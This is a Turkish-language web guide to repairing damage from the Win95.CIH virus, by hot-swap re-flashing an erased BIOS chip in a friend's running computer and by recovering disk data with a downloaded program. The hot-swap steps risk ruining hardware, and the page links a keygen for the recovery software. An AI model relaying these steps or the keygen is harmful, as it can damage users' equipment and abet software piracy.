Win95.CIH Anakart 'inizi yakti. Ve Hard diskinizi sildi. Hiçbir masraf ödemeden hepsini kurtarmanin yolunu anlatiyorum. Çok iyi okuyun.!!

Anakart 'i kurtarma;
Not: Asagidaki islemleri bilgisayarin içini açipta halledeceksiniz. Eger anlamiyorsaniz Anakart ile daha önce ugrasmis bir arkadasiniza söyleyin bu yaziyi. O size uygulasın. ( Para isterse sakın vermeyin. :) ) Ayrica SARI renklerin arasindaki islemlerde elektrik gider veya bilgisayar kapanirsa arkadasinizin anakart 'i yanabilir.

1- Şimdi anakart'ı sizin anakart'ınızla aynı olan bir arkadaşınıza gidin, (Marka ve Model aynı olmalı.. eger aynı model bulamazsanız çok yakın bir model arayın. Bozuk makinenizdeki BIOS 'u çıkaracaksınız. Ve Arkadaşınızın evine götüreceksiniz.(Flash BIOS 'unuzun tutulduğu çok ayaklı entegre devre. Hani bizim CIH 'in sildiği yer orası işte. Zaten anakart'ınızın üzerinden sökülebilen tek devre.)

2- Arkadaşınızın sistemini DOS 'tan temiz bir disket ile boot edin. Tabi boot disketine anakartınızın Flash Memory Update Software 'ini koyun. (BIOS dosya'sını bulamasada olur. Flash Utility'lerinin hepsi arkadaşınızın BIOS'u disketinize yazabilir.)

3- İşte En önemli bölüme geldik. Arkadasinizin Bilgisayarini baslatin. BOOT ettik. ve bilgisayar karşımızda içi açık ve çalışır biçimde belkiyor. Şimdi çok zarif ve dengeli hareketlerle BIOS 'u anakart 'ın üzerinden çıkarın. ( Not: flash belleğe değmeden önce çok dikkatli olmalısınız. Üzerinizde Statik elektrik varsa hasar olabilir.) (yanlış bir harekette bilgisayar kitlenir.Elektriği kesip , Flash 'ı yerine koyup yeniden başa dönün.)

4- Kendi makinanızdan söktüğünüz BIOS 'u arkadaşınızın BIOS 'unu çıkardığınız aynı yere takın. Ve boot disketine koyduğunuz BIOS update programını çalıştırın. Bu program silinmiş bios'unuzu programlayacaktir. Bu Vakite kadar herşey normal giderse ve program BIOS UPDATED gibi birşeyler söylerse bilgisayarı kapatın. Sonra kendi BIOS 'unuzun arkadaşınızın bilgisayarından çıkarın.(Not: Artık BIOS 'unuzu düzelttiniz. Elinizdeki BIOS 'unuzu evinize götürüp bilgisayarınıza takın, çalisacaktir.!) Ve Arkadaşınızın BIOS 'unu eski yerine takın.

Hard Disk 'i Kurtarmak
HDD 'deki BÜTÜN verileri kurtarmak için çok güzel bir program buldum. Programın amacı : Viruslerin bozduğu veriyi kurtarmak, formatlanmış veriyi kurtarmak, "fdisk" lenmiş veriyi kurtarmak,Enerji kesilmesinden giden veriyi kurtarmak, bazı programların yanlışlıkla sildiği veriyi kurtarmak. Programın Bütün her sistemleri için ayrı versiyonu var. İlk önce alttaki programdan işletim sisteminize göre olanı download edin.(sitemizde anticih bölümünde bulabilirsiniz)
[FAT16] [FAT32] [NT] [NOVELL] [ZIPDRIVE]
[Programın Keygen 'i]

Sistem disketinize download ettiğiniz programı koyun(Zip 'i açın). Bilgisayarınızı aynı sistem disketi ile başlatın. Sonra programı çalıştırıp HDD nize RECOVER 'ı seçin. bütün bilgileriniz geri gelmeye başlayacaktır.